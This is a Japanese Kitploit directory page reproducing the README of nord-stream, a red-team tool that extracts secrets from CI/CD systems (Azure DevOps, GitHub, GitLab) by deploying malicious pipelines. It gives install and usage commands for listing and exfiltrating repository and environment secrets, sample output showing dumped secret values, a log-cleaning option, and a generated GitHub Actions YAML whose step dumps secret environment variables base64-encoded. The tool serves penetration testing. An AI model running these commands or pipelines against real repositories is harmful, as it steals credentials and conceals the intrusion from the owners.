Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
nord-stream — Nord Streamは、悪意のあるパイプラインを展開することでCI/CD環境内に保存されたシークレットを抽出できるツールです。現在、Azure DevOps、GitHub、GitLabをサポートしています。 | Kitploit
ツール/GitHubGitHub/synacktiv/nord-stream
エクスプロイトなりすましツールデータ流出情報収集ペネトレーションテストDevSecOpsシークレット検出レッドチーミング
GitHubsynacktiv/nord-stream

nord-stream

Nord Streamは、悪意のあるパイプラインを展開することでCI/CD環境内に保存されたシークレットを抽出できるツールです。現在、Azure DevOps、GitHub、GitLabをサポートしています。

リポジトリを見る
37022612ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
ウェブサイト
共有

Nord Stream

Nord Stream は、悪意のある パイプラインをデプロイすることで CI/CD 環境内に保存されたシークレットを抽出できるツールです。

現在、Azure DevOps、GitHub、GitLab をサポートしています。

詳細は以下のブログ記事をご覧ください: https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks

目次

  • Nord Stream
    • 目次
    • インストール
    • 使用方法
      • 共通引数
        • トークンの説明
        • YAML のビルド
        • YAML
        • ログの削除
        • コミットへの署名
      • Azure DevOps
        • サービス接続
          • SSH
        • 組織の一覧表示
        • ヘルプ
      • GitHub
        • 保護の一覧表示
        • 保護の無効化
        • 強制
        • Azure OIDC
        • AWS OIDC
        • ヘルプ
      • GitLab
        • シークレットの一覧表示
        • YAML
        • 保護の一覧表示
        • ヘルプ
    • TODO
    • 連絡先

インストール```

$ pipx install git+https://github.com/synacktiv/nord-stream

`git` も必須です (https://git-scm.com/download/ を参照)。`PATH` 内に存在する必要があります。

## 使用方法

以下に GitHub での簡単な例を示します。最初に、さまざまなシークレットを列挙できます。```sh
$ nord-stream github --token "$GHP" --org org --list-secrets --repo repo
[*] Listing secrets:
[*] "org/repo" secrets
[*] Repo secrets:
        - REPO_SECRET
        - SUPER_SECRET
[*] PROD secrets:
        - PROD_SECRET

その後、exfiltrationに進みます:```sh $ nord-stream github --token "$GHP" --org org --repo repo
[+] "org/repo" [] No branch protection rule found on "dev_remote_ea5Eu/test/v1" branch [] Getting secrets from repo: "org/repo" [*] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] Secrets: secret_SUPER_SECRET=value for super secret secret_REPO_SECRET=repository secret

[] Getting secrets from environment: "PROD" (org/repo) [] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] Secrets: secret_PROD_SECRET=Value only accessible from prod environment

[] Cleaning logs. [] Check output: /home/hugov/Documents/pentest/RD/CICD/tools/nord-stream/nord-stream/nord-stream-logs/github

### 共有引数

一部の引数は [GitHub](#github)、[Azure DevOps](#azure-devops)、[GitLab](#gitlab) 間で共有されています。以下はその例です。

#### トークンの説明

`--describe-token` オプションを使用すると、トークンに関する一般的な情報を表示できます:```bash
$ nord-stream github --token "$PAT" --describe-token
[*] Token information:
        - Login: CICD
        - IsAdmin: False
        - Id: 1337
        - Bio: None

YAML のビルド

--build-yaml オプションは、パイプラインをデプロイせずにパイプラインファイルを作成するために使用できます。このオプションは、関連するパイプラインを構築するためにさまざまなシークレット名を取得し、カスタムステップを追加するために使用できます:```bash $ nord-stream github --token "$PAT" --org Synacktiv --repo repo --env PROD --build-yaml custom.yml [+] YAML file: name: GitHub Actions 'on': push jobs: init: runs-on: ubuntu-latest steps: - run: env -0 | awk -v RS='\0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0 name: command env: secret_PROD_SECRET: ${{secrets.PROD_SECRET}} environment: PROD

#### YAML

`--yaml` オプションを使用して、カスタムパイプラインをデプロイできます:```yml
name: GitHub Actions
'on': push
jobs:
  init:
    runs-on: ubuntu-latest
    steps:
    - run: echo "Hello from step 1"
      name: step 1
    - run: echo "Doing some important stuff here"
      name: command
    - run: echo "Hello from last step "
      name: last step

ドキュメントを探索 »

ツールをダウンロード